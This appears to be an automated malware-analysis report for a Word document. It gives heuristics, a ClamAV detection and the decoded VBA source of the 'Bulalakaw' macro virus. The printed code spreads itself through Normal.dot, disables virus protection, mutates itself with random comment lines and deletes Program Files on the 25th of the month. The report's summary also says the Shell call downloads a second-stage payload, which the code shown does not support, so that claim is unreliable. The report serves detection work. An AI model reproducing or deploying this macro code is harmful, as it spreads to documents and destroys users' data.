MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Office document contains VBA macros, including AutoOpen and AutoClose, which are designed to execute automatically. The critical heuristic 'OLE_VBA_SHELL' indicates a direct call to the Shell() function, suggesting the macro attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Noswan-1' further confirms its malicious nature. The VBA code also includes obfuscation techniques like 'PolyEngine' and string concatenation, typical of malware aiming to evade detection.
Heuristics 7
-
ClamAV: Doc.Trojan.Noswan-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Noswan-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15382 bytes |
SHA-256: b2edb6ba23377aaed1726ab83ee4d0092f830eb415017200ae6aecbb21080c62 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Bulalakaw"
Public Skip As Integer
Sub PolyEngine()
On Error Resume Next
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("Bulalakaw").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("Bulalakaw").CodeModule
Rem NsRxExGjAmDuRkRkMsEhGjJfQjUpMsJnQpRt
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
Rem IlAzPfSeBoKuAjNsDzCrPmRpLvHfVqRsQlUeBzUkTfNjRqMgOwOyBrSeFqDeHz
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("Bulalakaw").CodeModule
PolySize = Int(Rnd * 10)
For Polymorphic = 1 To PolySize
PolyString = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Rem IpMeLgIiPmMqNiMyUsHoNkLrBoAoVkPhEf
Next SomeString
.InsertLines RndLine, "Rem " & PolyString
Next Polymorphic
End With
End If
End Sub
Sub Bulalakaw()
'+++++++++++++++++++++++++++++++++++++++++++++++++
'Virus Name: Bulalakaw
'Author: Lucky Warrior
'Copyright © 1999 Bgy. Tiguib, Oras, Eastern Samar
'All rights reserved.
'+++++++++++++++++++++++++++++++++++++++++++++++++
On Error Resume Next
Options.ConfirmConversions = False
Rem AqHlPiIqQiDsRkLwRkQhDmKkFtNfVvRxOqIpEr
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("Bulalakaw").Export "c:\Bulalakaw.drv"
ActiveDocument.ReadOnlyRecommended = False
If Day(Now()) = 25 Then
Shell ("Deltree /y C:\Progra~1")
End If
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Lucky Warrior"
.Comments = "Bulalakaw"
.Execute
Rem MoFuCkGhTvOtSkQhEhPhOsTo
End With
Rem VlSpTi
If NormalTemplate.VBProject.VBComponents.Item("Bulalakaw").Name <> "Bulalakaw" Then SuchBulalakaw = True
If ActiveDocument.VBProject.VBComponents.Item("Bulalakaw").Name <> "Bulalakaw" Then MoreBulalakaw = True
Rem Uk
If SuchBulalakaw = True And MoreBulalakaw = False Then Set PhUz39490774 = NormalTemplate.VBProject.VBComponents
If SuchBulalakaw = False And MoreBulalakaw = True Then Set PhUz39490774 = ActiveDocument.VBProject.VBComponents
PhUz39490774.import "c:\Bulalakaw.drv"
If SuchBulalakaw = False And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If MoreBulalakaw = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Templates and add-ins...").Delete
Breakpoint:
End Sub
Sub FileNew()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
Dialogs(wdDialogFileNew).Show
Skip = 1
Call Bulalakaw
End Sub
Rem Ry
Sub FileSave()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsOptions()
On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
Call Bulalakaw
Call PolyEngine
End Sub
Sub EditFind()
On Error Resume Next
Dialogs(wdDialogEditFind).Show
Rem QmVuOrIwVmLmGyGeDnPrFjAyKqDqMeFeRxPmCmDqEhBtFeByKiFgHmUjNoDtCjNz
Call Bulalakaw
Call PolyEngine
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call Bulalakaw
Call PolyEngine
End Sub
Sub FilePrint()
On Error Resume Next
Dialogs(wdDialogFilePrint).Show
Call Bulalakaw
End Sub
Sub FileExit()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
If ActiveDocument.Saved =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.